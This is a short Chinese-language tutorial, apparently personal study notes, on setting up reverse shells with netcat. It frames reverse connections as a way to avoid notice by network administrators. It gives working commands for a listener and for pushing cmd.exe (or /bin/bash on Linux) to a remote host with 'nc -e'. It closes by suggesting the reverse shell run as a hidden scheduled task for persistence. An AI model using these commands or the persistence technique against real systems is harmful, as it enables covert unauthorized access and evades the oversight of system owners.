Netcat学习总结
一:前言
一般来说,网络管理员对客户端发起的连接服务器请求比较在意,只要是本机开放的1024端口以下都会进行仔细检查。
对服务器发起的请求就没那么在意了,毕竟端口那么多,不可能对每个端口都了解
利用反向连接能减少被网络管理员发现的概率
二:windows下的反向连接
netcat版本带e的才支持反向连接
客户端 win7 10.0.0.5
服务器 win2003 10.0.0.4
1.首先在客户端监听一个小于1024 没有占用的端口
nc -l -v -n -p 22
2.把netcat上传到服务器执行命令
nc -e cmd.exe 10.0.0.5 22
客户端的终端如下
3. 执行命令查看
客户端cmd
服务器的cmd
三:Linux下的反向连接
几乎和windows下的一种,只需将windows下的cmd改为/bin/bash
Linux下有两个netcat,一个是gnu netcat 一个是Netcat
可以采用Python进行反向连接
四:反向连接技巧
可以将反向连接作为一个定时任务来执行,每天或者每周的某个时候执行,平常在某个角落